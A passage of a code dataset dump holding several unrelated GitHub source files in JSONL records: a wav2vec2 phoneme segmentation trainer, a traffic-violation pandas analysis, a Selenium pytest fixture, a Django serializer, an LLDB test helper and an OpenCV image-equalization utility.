self.self_attn2(query, key, src, src_mask)\n # src = self.linear2(self.dropout(self.activation(self.linear1(self.activation(src)))))\n # src[torch.isnan(src)] = 0\n\n # src = self.self_attn2(src, src, src, src_mask)\n # src = self.linear2(self.dropout(self.activation(self.linear1(self.activation(src)))))\n # src[torch.isnan(src)] = 0\n\n return src\n","repo_name":"pbansal5/DeepMVI","sub_path":"layer_transformer.py","file_name":"layer_transformer.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"66"} +{"seq_id":"39651007872","text":"import os\nimport argparse\nimport json\nimport numpy as np\nimport pandas as pd\nimport soundfile as sf\nfrom tqdm import tqdm\nimport torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nimport transformers\nfrom transformers import (\n AutoConfig,\n AutoTokenizer,\n AutoFeatureExtractor,\n Wav2Vec2Processor,\n Wav2Vec2ForAudioFrameClassification,\n Trainer, \n TrainingArguments,\n)\nfrom datasets import load_dataset\nimport evaluate\nfrom sklearn import metrics\nfrom utils import *\nfrom models import CustomWav2Vec2Segmentation\n\n\ndef get_metadata(path,_set=None,_locale=None):\n \"\"\"\n Return metadata with specific set and locale\n \n Args\n ----\n path : str\n filepath of metadata.csv\n _set : str/list[str]/bool\n the set(s) it contains, only support combination \n of ['train','dev','test'], default None to select \n all sets\n _locale:\n the locale(s) it contain, default None to select \n all sets\n \n Return\n ------\n metadata : pd.DataFrame\n selected metadata \n \"\"\"\n metadata = pd.read_csv(path)\n if _set is not None:\n if isinstance(_set,list):\n metadata = metadata[(metadata['set'].isin(_set))]\n else:\n metadata = metadata[(metadata['set'] == _set)]\n if _locale is not None:\n if isinstance(_locale,list):\n metadata = metadata[(metadata['locale'].isin(_locale))]\n else:\n metadata = metadata[(metadata['locale'] == _locale)]\n return metadata\n\n\ndef get_vocab_dict(data,pad=None,unk=None):\n \"\"\"\n Return dictionary of token from a sequence of \n phonemes_detail in the metadata\n \n Args\n ----\n data : list[str]\n sequence of phonemes_detail, this method will transform\n the string in phonemes_detail as dict \n pad : str\n padding tokken, default : 'PAD'\n unk: str\n unknown tokken, default : 'UNK'\n \n Return\n ------\n vocab_dict : dict\n dictionary of token\n \n Example\n -------\n \n pad = '[PAD]'\n unk = '[UNK]'\n data = metadata['phonemes_detail']\n vocab_dict = get_vocab_dict(data,pad,unk)\n \n \"\"\"\n pad = 'PAD' if pad is None else pad\n unk = 'UNK' if unk is None else unk\n dictionary = {pad:0}\n lb = 1\n for phonemes_detal in tqdm(data):\n phonemes_detal = eval(phonemes_detal)\n phonemes = phonemes_detal['label']\n for phoneme in phonemes:\n if phoneme not in dictionary.keys():\n dictionary[phoneme] = lb\n lb += 1\n dictionary['UNK'] = lb\n return dictionary\n\n\nclass PhonemeSegmentor:\n \"\"\"\n\n\n \"\"\"\n def __init__(self,tokenizer,resolution,t_end=None,pad_token=\"[PAD]\"):\n self.tokenizer = tokenizer\n self.t_end = t_end\n self.resolution = resolution\n self.pad_token = pad_token\n pass\n \n def encode(self,phonemes_detal,**kwargs):\n t_end = kwargs.get('t_end',self.t_end) if kwargs.get('t_end',self.t_end) else self.get_t_end(phonemes_detal)\n arr = [self.tokenizer.encode(self.pad_token)[0] for _ in range(int(np.round(t_end/self.resolution)))]\n phonemes_detal = eval(phonemes_detal) if type(phonemes_detal) is not dict else phonemes_detal\n for a,b,label in zip(phonemes_detal['start'],phonemes_detal['end'],phonemes_detal['label']):\n a = int(np.round(a/self.resolution))\n b = int(np.round(b/self.resolution))\n arr[a:b] = [self.tokenizer.encode(label)[0]]*len(arr[a:b])\n return arr\n \n def decode(self,arr):\n dec = len(str(self.resolution).split(\".\")[1]) if not isinstance(self.resolution,int) else 0\n d = {k:[] for k in ['start','end','label']}\n a = 0*self.resolution\n if len(arr) == 1:\n i = 0\n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+1)*self.resolution,dec))\n label = self.tokenizer.decode(arr[i])\n d['label'].append(label)\n else:\n for i in range(len(arr)-1):\n if arr[i+1] != arr[i]: \n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+1)*self.resolution,dec))\n label = self.tokenizer.decode(arr[i])\n d['label'].append(label)\n a = i+1\n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+2)*self.resolution,dec))\n label = self.tokenizer.decode(arr[i])\n d['label'].append(label)\n return d\n \n def get_t_end(self,phonemes_detal):\n phonemes_detal = eval(phonemes_detal) if type(phonemes_detal) is not dict else phonemes_detal\n return phonemes_detal['label'][-1]\n\n\n# Data generator\nclass PhonemeDetailsDataset(Dataset):\n \"\"\"\n Pytorch Dataset read the row of the metadata and returns \n the follows items as dict:\n input_values: np.ndarray\n the audio array loaded by reading the column \n 'file_name' of a row in the metadata\n labels: str\n phonetic segmentation in string extract directly\n from column 'phonetic_detail' of a row in the\n metadata\n \n Attributes\n ---\n metadata: pd.DataFrame\n a pandas dataframe object that contains the \n informations about the audio \n data_dir: str\n the directory of all data, same as the directory \n where metadata.csv is located, default 'data'\n \n \"\"\"\n \n def __init__(self,metadata,data_dir='data'):\n self.metadata = metadata\n self.data_dir = data_dir\n \n def __len__(self):\n return len(self.metadata)\n \n def __getitem__(self,idx):\n row = self.metadata.iloc[idx,:]\n # audio input\n fpath = os.path.join(self.data_dir,row['file_name'])\n audio_input,sr = sf.read(fpath)\n # label\n label = row['phonetic_detail']\n # inputs\n example = {\"input_values\":audio_input,\"labels\":label}\n return example\n\n \n# Data processor/collator \nclass TrainingDataProcessor:\n \"\"\"\n Object that collates samples generated by \n PhonemeDetailsDataset as batch with desired format for \n huggingface transformers models to read. \n Can use as collate_fn for Pytorch Dataloader arguments\n \n Attributes\n ---\n sampling_rate: int\n sampeling rate of the audio \n resolution: float\n resolution of label segment in second \n tokenizer: PhonemeSegmentor\n tokenizer to translate phoneme_detail to array \n with size (batch,t,num_label), where t is \n t_end/resolution\n t_end: int\n length of array in sencod \n pad_to_sec: int\n nearest second the array pad to \n rtn_type: str\n tensor type to be return, currently only \n support pytorch 'pt' \n \n \"\"\"\n def __init__(self,sampling_rate,resolution,tokenizer,t_end=None,pad_to_sec=1,rtn_type='pt'):\n self.sampling_rate = sampling_rate\n self.resolution = resolution\n self.tokenizer = tokenizer\n self.t_end = t_end\n self.pad_to_sec = pad_to_sec\n self.rtn_type = rtn_type\n \n \n def __call__(self,inputs):\n audio_inputs,labels = [],[]\n t_end = self._get_max_t(inputs) if self.t_end is None else self.t_end\n for example in inputs:\n x = example[\"input_values\"]\n x = self.process_values(x,t_end)\n y = example[\"labels\"]\n y = self.process_labels(y,t_end)\n audio_inputs.append(x)\n labels.append(y)\n \n batch = self._rtn_batch(audio_inputs,labels)\n return batch\n \n def process_values(self,x,t_end):\n target_len = int(self.sampling_rate*t_end)\n pad_size = int(target_len - x.shape[0])\n if pad_size > 0:\n x = np.pad(x,(0,pad_size))\n elif pad_size < 0:\n x = x[:target_len]\n x = x.reshape(1,-1)\n return x\n \n def process_labels(self,y,t_end):\n # y = get_phonemes_segment(y,self.tokenizer,t_end,self.resolution)\n y = self.tokenizer.encode(y,t_end=t_end)\n y = np.reshape(y,(1,-1))\n return y\n \n def _get_max_t(self,inputs):\n # use 'input_values' max array length to calculate t \n maxlen = int(np.max([item['input_values'].shape[0] for item in inputs]))\n max_t = maxlen/self.sampling_rate\n pad_res = self.pad_to_sec if self.pad_to_sec is not None else self.resolution\n max_t = np.ceil(max_t/pad_res)*pad_res\n return max_t \n \n def _rtn_batch(self,audio_inputs,labels):\n if self.rtn_type == 'pt':\n audio_inputs = np.concatenate(audio_inputs)\n audio_inputs = torch.Tensor(audio_inputs)\n labels = np.concatenate(labels)\n labels = torch.Tensor(labels).long()\n else:\n raise ValueError(f\"Currently not support type: '{self.rtn_type}'\")\n return {\"input_values\":audio_inputs,\"labels\":labels}\n\n\n# loss \ndef nll_loss(logits,labels):\n logits = logits.reshape(-1,logits.shape[-1])\n labels = labels.flatten()\n loss = torch.nn.functional.cross_entropy(logits, labels, reduction=\"mean\")\n return loss\n\n\n# metric\ndef avg_sample_acc(predictions, references):\n \"\"\"calculate the accuracy of each sample in a batch and average the score\"\"\"\n if len(predictions) != len(references):\n raise ValueError(f\"length not equal: {len(predictions)} != {len(references)}\")\n if predictions.shape[1] != references.shape[1]:\n raise ValueError(f\"Time interval not equal\")\n if len(predictions.shape) != 3 or len(references.shape) != 2:\n raise ValueError(\"Dim not correct\")\n predictions = np.argmax(predictions,axis=-1) \n sample_accs = [metrics.accuracy_score(ref,pred) for ref,pred in zip(references,predictions)]\n avg = np.mean(sample_accs)\n return {'avg_sample_acc': avg}\n \n\ndef compute_avg_sample_acc(pred):\n \"\"\"wrapping function to feed HF style prediction into metric \"\"\"\n p = pred.predictions\n r = pred.label_ids\n return avg_sample_acc(p, r)\n\n\n# trainer\nclass CustomTrainer(Trainer):\n def compute_loss(self, model, inputs, return_outputs=False):\n labels = inputs.get(\"labels\")\n # forward pass\n outputs = model(**inputs)\n logits = outputs.get(\"logits\")\n loss = nll_loss(logits,labels)\n return (loss, outputs) if return_outputs else loss\n\n\ndef test_dataflow(model,dataset,data_collator,batch_size=2):\n \n dl = DataLoader(dataset=dataset,batch_size=batch_size,collate_fn=data_collator)\n example_inputs = next(iter(dl))\n input_values = example_inputs['input_values']\n labels = example_inputs['labels']\n \n if torch.cuda.is_available():\n model = model.cuda()\n input_values = input_values.cuda()\n labels = labels.cuda()\n\n print(\"example_inputs['input_values'].shape: \",example_inputs['input_values'].shape)\n print(\"example_inputs['labels'].shape: \",example_inputs['labels'].shape)\n\n with torch.no_grad():\n example_outputs = model(input_values,labels)\n\n logits = example_outputs.logits\n\n print(\"loss: \",nll_loss(logits,labels))\n \n if torch.cuda.is_available():\n model = model.cpu()\n logits = logits.cpu()\n labels = labels.cpu()\n \n print(\"metric: \",avg_sample_acc(logits,labels))\n return\n\n\ndef train(\n mode,\n model_checkpoint,\n train_locales,\n test_locales,\n sampling_rate,\n resolution,\n t_end,\n pad_to_sec,\n training_config,\n datadir,\n output_data_dir,\n num_encoders,\n num_convprojs,\n conv_hid_actv,\n conv_last_actv,\n **kwargs\n ):\n \n # compute config\n transformers.utils.logging.set_verbosity_error()\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n torch.backends.cuda.matmul.allow_tf32 = torch.cuda.is_available()\n \n if model_checkpoint is None:\n model_checkpoint = \"speech31/wav2vec2-large-english-phoneme-v2\"\n print(f\"Using checkpoint: {model_checkpoint}\")\n\n # save_subfolder config\n output_dir = output_data_dir\n output_mdl_dir = os.path.join(output_dir,'models') \n output_log_dir = os.path.join(output_dir,'logs') \n\n # data config\n data_dir = datadir\n metadata_dir = os.path.join(data_dir,'metadata.csv')\n if not os.path.exists(metadata_dir):\n raise Exception(f'Metadata does not existed, datadir: {os.listdir(data_dir)}')\n \n train_metadata = get_metadata(metadata_dir,'train',train_locales) \n valid_metadata = get_metadata(metadata_dir,'dev',test_locales) \n trainset = PhonemeDetailsDataset(train_metadata,data_dir) \n validaset = PhonemeDetailsDataset(valid_metadata,data_dir) \n print(f\"language\\n training:{train_locales} length: {len(trainset)}\\n test:{test_locales} length: {len(validaset)}\")\n \n # model and data-processor config \n hf_config = AutoConfig.from_pretrained(model_checkpoint)\n tokenizer_type = hf_config.model_type if hf_config.tokenizer_class is None else None\n hf_config = hf_config if hf_config.tokenizer_class is not None else None\n \n pad_token=\"(...)\"\n unk_token=\"UNK\"\n tokenizer = AutoTokenizer.from_pretrained(\n \"./\",\n config=hf_config,\n tokenizer_type=tokenizer_type,\n unk_token=unk_token,\n pad_token=pad_token,\n )\n \n segmentor = PhonemeSegmentor(tokenizer=tokenizer,resolution=resolution,pad_token=pad_token)\n data_collator = TrainingDataProcessor(\n sampling_rate=sampling_rate,\n resolution=resolution, \n t_end=t_end, \n pad_to_sec=pad_to_sec, \n tokenizer=segmentor \n )\n\n model = CustomWav2Vec2Segmentation(\n model_checkpoint,\n num_labels=tokenizer.vocab_size,\n num_encoders=num_encoders,\n num_convprojs=num_convprojs,\n conv_hid_actv=conv_hid_actv,\n conv_last_actv=conv_last_actv,\n resolution=resolution\n )\n \n if kwargs.get('freeze_encoder'):\n model.change_grad_state('encoder',range(30),False)\n \n training_config.update(\n output_dir=output_mdl_dir,\n logging_dir=output_log_dir,\n group_by_length = False, \n remove_unused_columns = False,\n optim=\"adafactor\", # <------------------------------------------- check necessity \n gradient_checkpointing=False, # <------------------------------------------- check necessity \n gradient_accumulation_steps=4,\n fp16=torch.cuda.is_available(),\n tf32=torch.cuda.is_available(),\n )\n\n training_args = TrainingArguments(**training_config)\n\n trainer = CustomTrainer(\n model=model,\n data_collator=data_collator, \n args=training_args,\n compute_metrics=compute_avg_sample_acc,\n train_dataset=trainset,\n eval_dataset=validaset,\n )\n \n print(\"Training runs on: \",training_args.device)\n\n if mode == \"train\":\n \n print(f\"Mode '{mode}'\")\n print(\"***** Training start *****\")\n \n trainer.train()\n\n eval_result = trainer.evaluate(eval_dataset=validaset)\n\n print(f\"***** Eval results *****\")\n write_json(eval_result,os.path.join(output_log_dir,'eval_result.json')) \n\n # Saves the model to s3\n trainer.save_model(output_mdl_dir) \n \n elif mode == \"debug\":\n \n print(f\"Mode '{mode}'\")\n \n test_dataflow(model,trainset,data_collator)\n \n else:\n \n print(f\"Mode {mode} not recognised, no process proceed\")\n \n print(\"***** Completed *****\")\n \n return\n\n\nif __name__ == \"__main__\":\n \n # arg \n config_files = ['segmentation_config.json','training_config.json',]\n configs = [read_json(c) for c in config_files]\n \n parser = argparse.ArgumentParser()\n \n for config in configs:\n add_argument_from_default_config(parser,config)\n \n parser.add_argument('--datadir', type=str, default='data')\n parser.add_argument(\"--output_data_dir\", type=str, default='outputs')\n \n args, _ = parser.parse_known_args()\n \n args_dic = extract_args_by_default_config(args,configs[0])\n args_dic['training_config'] = extract_args_by_default_config(args,configs[1])\n args_dic['output_data_dir'] = args.output_data_dir\n args_dic['datadir'] = args.datadir\n \n print(\"ARGS:\\n\",args_dic,\"\\n\")\n train(**args_dic)\n","repo_name":"hslau44/common-phone","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":16685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13960375306","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read file and take only the first 10000 rows with applicable columns.\r\n# Apparently the graphs look different and better on the larger(original) file. \r\n#But for efficiency let's stick with these.:-)\r\ndata = pd.read_csv(\"Traffic_Violations.csv\", nrows = 10000)\r\ndf = pd.DataFrame(data, columns = [\"Date Of Stop\", \"Time Of Stop\", \"Description\", \"SubAgency\", \"VehicleType\", \"Latitude\", \"Longitude\", \"Accident\", \"Belts\", \"State\", \"Geolocation\"]) \r\n#After initial analysis we realized that we have agencies with the names S15 and W15\r\n# but they do not have any violations registered and we romoved those rows.\r\ndf = df[(df.SubAgency != \"S15\") & (df.SubAgency !=\"W15\")]\r\nprint(str(len(df)) + \" records were read from this file\")\r\n\r\nprint(\"Feature #1\")\r\nprint(\"=\"*70)\r\n# Ploting the distribution of vilation per district by SubAgency chart\r\ndf1 = df.groupby(\"SubAgency\").count()\r\nx = df1.index.tolist()\r\n#check what the list of districts look like\r\nprint(\"We hava data for the following districts:\")\r\nfor i in x:\r\n print(i)\r\n\r\n#shortening the names in the list for better visualization &populating x and y axis\r\nx1 =[]\r\nfor i in range(len(x)):\r\n b = \"dist\" + str((i+1))\r\n x1.append(b)\r\ny = df1[\"Description\"].tolist()\r\n\r\nplt.plot(x1, y)\r\nplt.xlabel(\"District\")\r\nplt.ylabel(\"Traffic Violations\")\r\nplt.title(\"Violations per district\")\r\n#renaming the yticks for better visualization. It makes sense only for the \r\n#original(larger) file\r\nplt.yticks([0,50000, 100000,150000,200000,250000,300000,350000],[\"0\",\"100K\",\"150K\",\"200K\",\"250K\",\"300K\",\"350K\"])\r\nplt.show()\r\n#the graph visualization looks much better(and diferrent when applied to the whoule dataset)\r\n#sorting the # of violations per dist and diplaying the max\r\ndf1 = df1.sort_values(by = [\"Time Of Stop\"], ascending = False)\r\ndf1 = df1[\"Time Of Stop\"]\r\nprint(\"Top 3 agencies with most violations\")\r\nprint(df1.head(3))\r\n\r\nprint(\"\\nFeature #2\")\r\nprint(\"=\"*70)\r\n# Filtering only the violations resulting in an accident.\r\ndf2 = df[df['Accident'] == \"Yes\"]\r\ndf2['Time Of Stop'] = pd.to_datetime(df2['Time Of Stop'])\r\ndf2 = df2.groupby(pd.Grouper(key='Time Of Stop', freq='1H'))\r\n#ploting the distribution of violations resuting in an accident relative to time of occurance\r\ndf2['Accident'].count().plot()\r\nplt.ylabel(\"Number of Accidents\")\r\nplt.title(\"Accidents Distribution in 24 hours\")\r\nplt.show()\r\n","repo_name":"mdevis1/project-share","sub_path":"Step0.py","file_name":"Step0.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30918692141","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as OptionsChrome\nfrom selenium.webdriver.firefox.options import Options as OptionsFirefox\n\n\ndef pytest_addoption(parser): # для считывания с консоли параметра браузера/языка\n parser.addoption('--browser_name', action='store', default='chrome',\n help=\"Choose browser: chrome or firefox\")\n parser.addoption('--language', action='store', default=\"en\",\n help=\"Choose language\")\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n browser_name = request.config.getoption(\"browser_name\") # для использования введенной переменной\n language = request.config.getoption(\"language\")\n browser = None\n if browser_name == \"chrome\":\n options = OptionsChrome()\n options.add_experimental_option('prefs', {'intl.accept_languages': language})\n print(f\"\\n{language}\")\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome(options=options)\n elif browser_name == \"firefox\":\n options = OptionsFirefox()\n options.set_preference(\"intl.accept_languages\", language)\n browser = webdriver.Firefox(options=options)\n print(f\"\\n{language}\")\n print(\"\\nstart firefox browser for test..\")\n else:\n raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n","repo_name":"Evgen-QA/Autotests_Python","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9424376255","text":"\"\"\" Newsletter Serializers. \"\"\"\n\n# Django rest framework\nfrom rest_framework import serializers\n\n# Models\nfrom contact.models import NewsletterContact\n\nclass NewsletterContactModelSerializer(serializers.ModelSerializer):\n \"\"\" Newsletter contact model serializer. \"\"\"\n \n class Meta(): \n \"\"\" Meta class. \"\"\"\n model = NewsletterContact\n fields = (\n 'id',\n 'email',\n 'ip_address',\n 'user_agent',\n 'status'\n )","repo_name":"Kionashi/diversidiomas-api","sub_path":"contact/serializers/newsletter.py","file_name":"newsletter.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11617291229","text":"import lldb\n\ndebugger_copy = None\nresult_copy = None\n\n\ndef save_debugger(debugger, command, context, result, internal_dict):\n global debugger_copy, result_copy\n debugger_copy = debugger\n result_copy = result\n result.AppendMessage(str(debugger))\n result.SetStatus(lldb.eReturnStatusSuccessFinishResult)\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/commands/command/script/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"21505408362","text":"from ast import Assert\nimport os\nimport glob\nfrom typing import Tuple\nimport cv2 as cv\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom math import sqrt\nfrom pathlib import Path\n\ndef move_figure(f, x, y):\n backend = matplotlib.get_backend()\n if backend == 'TkAgg':\n f.canvas.manager.window.wm_geometry(\"+%d+%d\" % (x, y))\n elif backend == 'WXAgg':\n f.canvas.manager.window.SetPosition((x, y))\n else:\n # This works for QT and GTK\n f.canvas.manager.window.move(x, y)\n\n''' ---------------\n This function returns, to a given natural number x,\n the nearest number b such that x <= b*b holds.\n'''\ndef nearest_perfect_square(x):\n y = x\n max_iter = 1000\n while(max_iter > 1):\n b = int(sqrt(y))\n if b*b == y:\n break\n else:\n y += 1\n max_iter -= 1\n return b\n\n''' ---------------\n This class manages the directory \"data\" in the working directory\n and their files in it.\n Attributes:\n - subdir_names: list of strings of subdirectories in data\n - subdir_paths: dictionary consisting of the paths to each\n subdirectory with the corresponding key from\n subdir_names.\n - subdir_filenames: dictionary consisting of all the png-filenames in each\n subdirectory with the corresponding key from\n subdir_names.\n - subdir_paths_of_filenames: dictionary consisting of the paths to each\n filename with the corresponding key from\n subdir_names.\n Methods: \n Are described above.\n'''\nclass DataFiles():\n def __init__(self, cwd: str) -> None:\n data_dir = cwd + '/data'\n data_subdir = os.listdir(data_dir)\n\n subdir_names = []\n\n for i in range(len(data_subdir)):\n # Only subdirectories?\n if os.path.isdir(data_dir + '/' + data_subdir[i]):\n # Only non-empty subdirectories\n if os.listdir(data_dir + '/' + data_subdir[i]):\n subdir_names.append(data_subdir[i])\n\n self.subdir_names = subdir_names\n\n subdir_paths = {}\n for i in range(len(subdir_names)):\n subdir_paths[subdir_names[i]] = data_dir + '/' + subdir_names[i]\n \n self.subdir_paths = subdir_paths\n\n subdir_filenames = {}\n for i in range(len(subdir_names)):\n subdir_filenames[subdir_names[i]] = [os.path.basename(x) for x in glob.glob(self.subdir_paths[subdir_names[i]] + '/*.png')]\n \n self.subdir_filenames = subdir_filenames\n\n subdir_paths_of_filenames = {}\n for i in range(len(subdir_names)):\n temp_lst = []\n for j in range(len(self.subdir_filenames[subdir_names[i]])):\n temp_lst.append(self.subdir_paths[subdir_names[i]] + '/' + self.subdir_filenames[subdir_names[i]][j])\n subdir_paths_of_filenames[subdir_names[i]] = temp_lst\n\n self.subdir_paths_of_filenames = subdir_paths_of_filenames \n\n ''' ---------------\n Function to return a list of the filenames in a given subdirectory \n '''\n def get_subdir_filenames(self, subdirname) -> list:\n try:\n filenames = []\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n filenames = self.subdir_filenames[subdirname]\n return filenames\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function to returns a string of the filename path in a given subdirectory \n '''\n def get_subdir_filename_path(self, subdirname, filename) -> str:\n try:\n filename_path = '' \n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert filename in self.subdir_filenames[subdirname], \"No file in directory {} with this name!\".format(subdirname)\n filename_path = self.subdir_paths_of_filenames[subdirname]\n return filename_path\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function returns the bgr-format from opencv.imread from a specific filename.\n - subdirname: name of the subdirectory which contains the desired image\n - filename: the image from whom we want the bgr-format\n '''\n def get_img_from_filename(self, subdirname, filename):\n try:\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert filename in self.subdir_filenames[subdirname], \"No file in directory {} with this name!\".format(subdirname)\n img_index = self.subdir_filenames[subdirname].index(filename)\n img_bgr = cv.imread(self.subdir_paths_of_filenames[subdirname][img_index])\n return img_bgr\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function to get lists of the desired files in given subdirectory\n in form of numpy-arrays from cv.imread\n - img_of_files: list of the names of the images as string\n '''\n def make_img_list(self, subdirname) -> list:\n try:\n img_of_files = []\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n num_files = len(self.subdir_filenames[subdirname])\n for i in range(num_files):\n img = cv.imread(self.subdir_paths_of_filenames[subdirname][i])\n img_of_files.append(img)\n\n return img_of_files\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Provides a simple plot of a specific image, given by an filename,\n in a given subdirectory.\n '''\n def plot_specific_image_by_name(self, subdirname, imagename):\n try:\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert imagename in self.subdir_filenames[subdirname], \"No file with this name in subdirectory {}\".format(subdirname)\n img = cv.imread(self.subdir_paths[subdirname] + '/' + imagename)\n rgb_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n fig, ax = plt.subplots(figsize = (12, 8), layout = 'constrained')\n ax.set_title('Image: {} in folder: {}'.format(imagename, subdirname))\n ax.imshow(rgb_img)\n move_figure(fig, 0, 0)\n plt.show()\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Provides a simple plot of a specific image, given in bgr-format.\n '''\n def plot_specific_image(self, img):\n rgb_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n fig, ax = plt.subplots(figsize = (12, 8), layout = 'constrained')\n ax.set_title('Image')\n ax.imshow(rgb_img)\n move_figure(fig, 0, 0)\n plt.show()\n ''' ---------------\n Function to plot two images in numpyarray-format, this function should be\n used to compare those two images.\n - img1: image on the left side of the subplot in bgr-format from opencv.imread\n - img2: image on the right side of the subplot in bgr-format from opencv.imread\n - save: bool, when true plot will be saved\n - description: str of possible modification of the right-side image\n '''\n def plot2img(self, \n img1_bgr, \n img2_bgr,\n save, \n description):\n rgb_img1 = cv.cvtColor(img1_bgr, cv.COLOR_BGR2RGB)\n rgb_img2 = cv.cvtColor(img2_bgr, cv.COLOR_BGR2RGB)\n fig = plt.figure(figsize = (12, 8))\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n ax1.imshow(rgb_img1), ax1.set_title('Original')\n ax2.imshow(rgb_img2), ax2.set_title('Output (%s)' % description)\n if save:\n p = Path('C:/Users/markorb/git/defect_detection/data/test/points/punktuell_vergleich_2.png')\n plt.savefig(p)\n move_figure(fig, 0, 0)\n plt.show() \n \n ''' ---------------\n Same method as \"plot2img\" but one can plot four images in one figure.\n This method was meant to plot one original image and three different \n modifications of that image.\n - img1: originial image in the upper left corner in bgr-format from opencv.imread\n - img2-img4: modified images in bgr-format from opencv.imread\n - imagename: str of the original image\n - descriptions: list how img2-img4 are modified in the corresponding order\n '''\n def plot_all_transfomrs(self, img):\n\n descriptions = ['Original', 'Std Histogram Eq.', 'CLAHE in gray', \n 'CLAHE in HSV', 'CLAHE in Lab', 'CLAHE with YUV']\n img_transforms_bgr = {}\n img_transforms_bgr[descriptions[0]] = img\n img_transforms_bgr[descriptions[1]] = self.get_EqualHist_img(img)\n img_transforms_bgr[descriptions[2]] = self.get_Clahe_img_gray(img)\n img_transforms_bgr[descriptions[3]] = self.get_Clahe_img_hsv(img)\n img_transforms_bgr[descriptions[4]] = self.get_Clahe_img_lab(img)\n img_transforms_bgr[descriptions[5]] = self.get_Clahe_img_yuv(img)\n\n img_transforms = {}\n for i in range(len(descriptions)):\n img_transforms[descriptions[i]] = cv.cvtColor(img_transforms_bgr[descriptions[i]], cv.COLOR_BGR2RGB)\n \n ''' ---------------\n Compute necessary rows and columns for the subplots\n depending on the number of images.\n '''\n num_images = len(descriptions)\n col = nearest_perfect_square(num_images)\n # Necessary rows\n row = num_images//col\n if num_images % col != 0:\n row += 1\n\n figure = plt.figure(figsize=(12, 8))\n \n # Create a position index\n position = range(1, len(descriptions) + 1)\n for i in range(len(descriptions)):\n ''' ---------------\n First instance of Rows accounts only for rows completely filled \n by subplots, then is added one more Row\n '''\n ax = figure.add_subplot(row, col, position[i])\n ax.imshow(img_transforms[descriptions[i]])\n ax.set_title(descriptions[i])\n \n move_figure(figure, 0, 0)\n plt.show()\n\n ''' ---------------\n This method returns an grayscale image after using a CLAHE transform \n in the bgr-format.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_gray(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR images into the gray spaces \n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img_gray_histeq = clahe.apply(gray_image)\n return cv.cvtColor(img_gray_histeq, cv.COLOR_GRAY2BGR)\n\n ''' ---------------\n This method returns an bgr-image after using a CLAHE transform in the value plane,\n of the correspondig HSV-image.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_hsv(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR images into the hsv color spaces \n hsv_image = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n ''' ---------------\n Applying limited adaptive Histogram Equalization onto the\n layer which are describing the intensity of the image, in the\n corresponding color space.\n ''' \n hsv_image[:,:,2] = clahe.apply(hsv_image[:,:,2])\n return cv.cvtColor(hsv_image, cv.COLOR_HSV2BGR)\n\n ''' ---------------\n This method returns an bgr-image after using a CLAHE transform in the value plane,\n of the correspondig HSV-image.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_lab(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR images into the lab color spaces \n lab_image = cv.cvtColor(img, cv.COLOR_BGR2Lab)\n lab_image[:,:,0] = clahe.apply(lab_image[:,:,0])\n return cv.cvtColor(lab_image, cv.COLOR_Lab2BGR) \n \n def get_Clahe_img_yuv(self, img, \n clipLimit = 2.0, 